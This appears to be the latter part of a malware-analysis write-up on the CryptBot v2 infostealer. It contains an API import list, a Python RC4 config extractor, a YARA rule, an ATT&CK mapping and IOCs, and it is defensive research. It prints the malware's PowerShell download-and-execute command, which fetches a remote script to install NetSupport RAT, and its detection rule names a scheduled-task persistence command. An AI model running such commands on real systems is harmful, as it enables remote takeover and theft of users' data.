swprintf_s
_snwprintf_s
_vscprintf
vsnprintf
_vscwprintf
vswprintf
NULL
WideCharToMultiByte
MultiByteToWideChar
GetComputerNameA
GetComputerNameW
GetUserNameA
GetUserNameW
CopyFileA
CopyFileW
CopyFileExA
CopyFileExW
DeleteFileA
DeleteFileW
MoveFileA
MoveFileW
MoveFileExA
MoveFileExW
CreateDirectoryA
CreateDirectoryW
RemoveDirectoryA
RemoveDirectoryW
NULL
EnumDisplaySettingsA
EnumDisplaySettingsW
CreateDCA
CreateDCW
CreateCompatibleDC
CreateCompatibleBitmap
SelectObject
BitBlt
GetDeviceCaps
StretchBlt
GetObjectA
GetObjectW
GetDIBits
ReleaseDC
DeleteDC
NULL
GdiplusStartup
GdipGetImageEncoders
GdipGetImageEncodersSize
GdipLoadImageFromFile
GdipCreateBitmapFromHBITMAP
GdipSaveImageToFile
GdipSaveImageToStream
GetBitmapBits
DeleteObject
GdiplusShutdown
NULL
SHCreateMemStream
CreateStreamOnHGlobal
SaveImageToStream
IStream_Size
IStream_Reset
IStream_Read
NULL
ExtractFilesA
ExtractFilesW
Extract
FCICreate
FCIAddFile
FCIFlushFolder
FCIFlushCabinet
FCIDestroy
NULL
CryptUnprotectData
GetTickCount
GetTickCount64
QueryPerformanceCounter
CreateToolhelp32Snapshot
Process32FirstA
Process32FirstW
Process32NextA
Process32NextW
GetLocaleInfoA
GetLocaleInfoW
GetLogicalDriveStringsA
GetLogicalDriveStringsW
GetDriveTypeA
GetDriveTypeW
GetVolumeInformationA
GetVolumeInformationW
GetDiskFreeSpaceExA
GetDiskFreeSpaceExW
ReadConsoleA
ReadConsoleW
WriteConsoleA
WriteConsoleW
GetCommandLineA
GetCommandLineW
GetConsoleMode
printf
wprintf
atoi
_wtoi
FileTimeToSystemTime
GetFileInformationByHandle
IsBadReadPtr
SystemTimeToFileTime
GetTimeZoneInformation
GetLocalTime
GlobalMemoryStatusEx
DuplicateHandle
GetCurrentProcess
GetCurrentThread
GetUserDefaultLocaleName
GetSystemMetrics
GetSystemInfo
GetNativeSystemInfo
IsWow64Process
IsWow64Process2
GetKeyboardLayoutList
RtlGetVersion
GetLastError
SetErrorMode
abs
clock
OpenProcess
TerminateProcess
RmStartSession
RmRegisterResources
RmGetList
RmEndSession
strtod
isspace
Sleep
SleepEx
GetExitCodeThread
ExitThread
ExitProcess
FileTimeToDosDateTime
WinHttpSetOption
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL

Backdoor Deployment

At address 0x00428680, the malware executes a PowerShell command to drop NetSupport RAT:

Powershell-Command

The powershell command is executed with the following parameters:

/c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "
$Resp = Invoke-WebRequest -Uri 'https://brewdogebar[.]com/code.vue' -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'; 
$Scr = [System.Text.Encoding]::UTF8.GetString($Resp.Content); IEX 
$Scr"

This command downloads and executes a remote script, enabling persistent remote access.

Malware Configuration Extractor

The following Python script automates RC4-based configuration extraction, implementing the mw_rc4 function to decrypt the encrypted blob extracted from byte_42FB58. It assumes the blob is provided as hex and uses the hardcoded key oSabnN. For full automation, integrate with a disassembler like IDA Pro.

import argparse
import re

def rc4(key, data):
    """
    RC4 decryption implementation based on CryptBot's mw_rc4 function.
    Key: The encryption key (e.g., 'oSabnN').
    Data: The encrypted blob as bytes.
    Returns: Decrypted data as a bytearray.
    """
    S = list(range(256))
    j = 0
    out = bytearray()

    # KSA (Key Scheduling Algorithm)
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    # PRGA (Pseudo-Random Generation Algorithm)
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        k = S[(S[i] + S[j]) % 256]
        out.append(byte ^ k)

    return out

def extract_config(binary_path, key_str='oSabnN', blob_size=6500):
    """
    Extracts and decrypts the configuration from a CryptBot binary.
    binary_path: Path to the binary file.
    key_str: RC4 key (default: 'oSabnN').
    blob_size: Size of the encrypted blob (default: 6500).
    Returns: Decrypted configuration as a string or error message.
    """
    key = bytearray(key_str.encode('utf-8'))
    
    try:
        with open(binary_path, 'rb') as f:
            binary_data = f.read()
    except Exception as e:
        return f"Error reading binary file: {e}"

    # Search for the RC4 key in the binary
    key_pattern = re.escape(key_str).encode('utf-8')
    key_match = re.search(key_pattern, binary_data)
    
    if not key_match:
        return "Error: RC4 key 'oSabnN' not found in binary."

    # Locate the encrypted blob (byte_42FB58)
    blob_start = None
    try:
        base_address = 0x400000  # Typical PE base address
        target_offset = 0x0042FB58 - base_address
        if target_offset + blob_size <= len(binary_data):
            blob_start = target_offset
        else:
            blob_start = key_match.end() + 10  # Heuristic offset
    except:
        return "Error: Unable to determine blob offset."

    if blob_start + blob_size > len(binary_data):
        return "Error: Blob size exceeds binary length."

    # Extract and decrypt the blob
    encrypted_blob = binary_data[blob_start:blob_start + blob_size]
    decrypted = rc4(key, encrypted_blob)
    
    try:
        config = decrypted.decode('latin1').rstrip('\x00')
        config_lines = [line for line in config.split('\x00') if line]
        return '\n'.join(config_lines)
    except UnicodeDecodeError:
        return decrypted.hex()

def main():
    parser = argparse.ArgumentParser(description="CryptBot v2 Configuration Extractor")
    parser.add_argument("binary", help="Path to the CryptBot binary file")
    parser.add_argument("--key", default="oSabnN", help="RC4 key (default: oSabnN)")
    parser.add_argument("--size", type=int, default=6500, help="Size of encrypted blob (default: 6500)")
    args = parser.parse_args()

    config = extract_config(args.binary, args.key, args.size)
    print("Decrypted Configuration:")
    print(config)

if __name__ == "__main__":
    main()

Explanation of the Extractor

Yara Rule

This Yara rule detects CryptBot v2 based on the RC4 key, C2 endpoints, persistence commands, and stealer strings, refined to match the updated findings.

rule CryptBot_v2 {
    meta:
        author = "0xw43l"
        description = "Detects CryptBot v2 infostealer based on RC4 key, C2 strings, and configuration artifacts"
        reference = "https://0xw43l.com/posts/CryptBot-0x02/"
        date = "2025-08-23"

    strings:
        // RC4 Key
        $key = "oSabnN" ascii fullword
        
        // C2 Domains and Paths
        $c2_1 = "gceight8vt.top" ascii
        $c2_2 = "/index.php" ascii
        $c2_3 = "/gate.php" ascii
        $c2_4 = "/zip.php" ascii
        $c2_5 = "/upload.php" ascii
        $path_1 = "\\Winodukec" ascii
        $path_2 = "\\ServiceData" ascii
        $path_3 = "\\ServiceData\\Clip.jpg" ascii
        $path_4 = "\\ServiceData\\Clip.exe" ascii
        
        // Persistence Command
        $persist = "/c schtasks /create /tn \\Service\\Data /tr" ascii
        
        // Stealer Strings
        $s1 = "UID:" ascii
        $s2 = "UserName:" ascii
        $s3 = "ComputerName:" ascii
        $s4 = "DateTime:" ascii
        $s5 = "UserAgent:" ascii
        $s6 = "Keyboard Languages:" ascii
        $s7 = "Display Resolution:" ascii
        $s8 = "CPU:" ascii
        $s9 = "RAM:" ascii
        $s10 = "GPU:" ascii
        $s11 = "Installed Apps:" ascii

    condition:
        $key and (2 of ($c2_*)) and (2 of ($path_*)) and $persist and 6 of ($s*)
}

Yara Rule Enhancements

Samples (SHA256 Hashes)

MITRE ATT&CK Mapping

Tactic Technique ID Technique Name
Initial Access T1204.002 User Execution: Malicious File
Execution T1059.001 Command and Scripting Interpreter: PowerShell
Execution T1059.007 Command and Scripting Interpreter: JavaScript/JScript
Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion T1140 Deobfuscate/Decode Files or Information
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion T1497 Virtualization/Sandbox Evasion
Credential Access T1555.003 Credentials from Password Stores: Credentials from Web Browsers
Collection T1005 Data from Local System
Collection T1119 Automated Collection
Collection T1113 Screen Capture
Command and Control T1071.001 Application Layer Protocol: Web Protocols
Command and Control T1573.001 Encrypted Channel: Symmetric Cryptography
Exfiltration T1041 Exfiltration Over C2 Channel

Indicators of Compromise (IOCs)

Type Indicator Description
Domain gceight8vt.top C2 Domain
Domain rceight8sr.top C2 Domain
Domain grabios.org C2 Domain
Domain brewdogebar.com NetSupport RAT Hosting
Domain enotik5050.com NetSupport RAT Hosting
Domain barsuk5050.com NetSupport RAT Hosting
Domain nextomax.b-cdn.net ZIP Hosting Server
Domain forikabrof.click Pinged by PowerShell
IP 94.232.244.133 Associated IP
Hash (SHA256) 7ccda59528c0151bc9f11b7f25f8291d99bcf541488c009ef14e2a104e6f0c5d Sample
Hash (SHA256) 34dcc780d2a2357c52019d87a0720802a92f358d15320247c80cc21060fb6f57 Sample
Hash (SHA256) ff10143803f39c6c08b2fbe846d990b92c6d1b71e27f89bca69ab9331945b14a Sample
Hash (SHA256) e7a83ddae3eec8ce624fc138e1dddb7f3ff5c5c9f20db11f60e22f489bdcc947 Sample
Hash (SHA256) e3bf61f6f96d1a121a1f7f47188cd36fc51f4565ca8cd8fc07207e56a038e7ca LNK File
Hash (SHA256) fd7654c5bb79652bc0db2696da35497b9aff2c783ec4c83705d33d329dc742d8 HTA (EXE)
Hash (SHA256) b2080e7705283fce7e03c8895977c5e8c451b5f8a6eb3faecb8acb986a1587c6 ZIP
Hash (SHA256) 4810333bf96fb808604f3657118c734c3dd8ee4baa3e6ffe8da548ae0c8e15d3 IDATLOADER
Hash (SHA256) 7ac46eb84f4b6d25601f23d2c30b7e80b6f3b2d82d3240234fc50af75290a29f YASS Stealer (Unpacked)

References